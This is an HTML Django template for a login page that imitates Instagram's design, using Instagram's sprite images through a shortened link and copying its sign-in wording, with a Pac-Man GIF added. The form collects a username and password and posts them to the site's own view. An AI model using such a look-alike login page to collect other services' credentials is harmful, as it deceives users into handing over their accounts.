<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="https://cdn.tailwindcss.com" rel="stylesheet">
</head>
<body class="h-screen overflow-hidden flex items-center justify-center" style="background: #edf2f7;">
    <!DOCTYPE html>
<html class="border-l" lang="en">
<head>
    <meta charset="UTF-8">
    <link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet">
    <link href="https://tenor.com/view/pac-man-pacman-pac-man-tv-show-tv-series-gif-4430214690053915114" rel="stylesheet">
    <style>
        * {
            margin: 0;
            padding: 0;
        }
        .instagram-logo {
            background-position: 0 -130px;
            height: 51px;
            width: 175px;
            background-image: url(https://bit.ly/3v2LT17);
        }
        .facebook-logo {
            background-position: -414px -259px;
            background-image: url(https://bit.ly/3v2LT17);
            height: 16px;
            width: 16px;
        }
        .apple-store-logo {
            background-position: -132px -182px;
            height: 42px;
            width: 128px;
            background-image: url(https://bit.ly/3v2LT17);
        }
        .google-store-logo {
            background-position: 0 -182px;
            height: 42px;
            width: 130px;
            background-image: url(https://bit.ly/3v2LT17);
        }
        .logo-animete{
            color: #e56245;
            font-size: 28px;
        }
        .logo-with{
            color: #5d50d0;
            font-size: 20px;
        }
        .logo-insta{
            color: #ce297c;
            font-size: 28px;
        }
        .logo-image{
            margin: 0;
            padding: 0;
        }
        .bg-image{
            height: 100%;
        }
    </style>
</head>
<body style="background-color: #e56245;" >
<div class="h-screen flex flex-col justify-center items-center bg-image">
    <div class="bg-white border border-gray-300 w-80 py-8 flex items-center flex-col mb-3">
        <img src="/static/logo.png" class="logo-image" alt="">

        <div class="tenor-gif-embed" data-postid="4430214690053915114" data-share-method="host" data-aspect-ratio="1.36364" data-width="100%"><a href="https://tenor.com/view/pac-man-pacman-pac-man-tv-show-tv-series-gif-4430214690053915114">Pac Man Pacman GIF</a>from <a href="https://tenor.com/search/pac+man-gifs">Pac Man GIFs</a></div> <script type="text/javascript" async src="https://tenor.com/embed.js"></script>

        <form class="mt-8 w-64 flex flex-col" method="post">
            {% csrf_token %}
            <input autofocus
                   class="text-xs w-full mb-2 rounded border bg-gray-100 border-gray-300 px-2 py-2 focus:outline-none focus:border-gray-400 active:outline-none"
                   id="email" placeholder="Phone number, username, or email" name="username" type="text">
            <input autofocus
                   class="text-xs w-full mb-4 rounded border bg-gray-100 border-gray-300 px-2 py-2 focus:outline-none focus:border-gray-400 active:outline-none"
                   id="password" name="password" placeholder="Password" type="password">
            <button class=" text-sm text-center bg-blue-300 text-white py-1 rounded font-medium" type="submit">
                Log In
            </button>
        </form>
        <div class="flex justify-evenly space-x-2 w-64 mt-4">
            <span class="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
            <span class="flex-none uppercase text-xs text-gray-400 font-semibold">or</span>
            <span class="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
        </div>
        <button class="mt-4 flex">
            <div class="bg-no-repeat facebook-logo mr-1"></div>
            <span class="text-xs text-blue-900 font-semibold">Log in with Facebook</span>
        </button>
        <a class="text-xs text-blue-900 mt-4 cursor-pointer -mb-4">Forgot password?</a>
    </div>
    <div class="bg-white border border-gray-300 text-center w-80 py-4">
        <span class="text-sm">Don't have an account?</span>
        <a class="text-blue-500 text-sm font-semibold">Sign up</a>
    </div>
    <div class="mt-3 text-center">
        <span class="text-xs">Get the app</span>
        <div class="flex mt-3 space-x-2">
            <div class="bg-no-repeat apple-store-logo"></div>
            <div class="bg-no-repeat google-store-logo"></div>
        </div>
    </div>
</div>
</body>
</html>
</body>
</html>
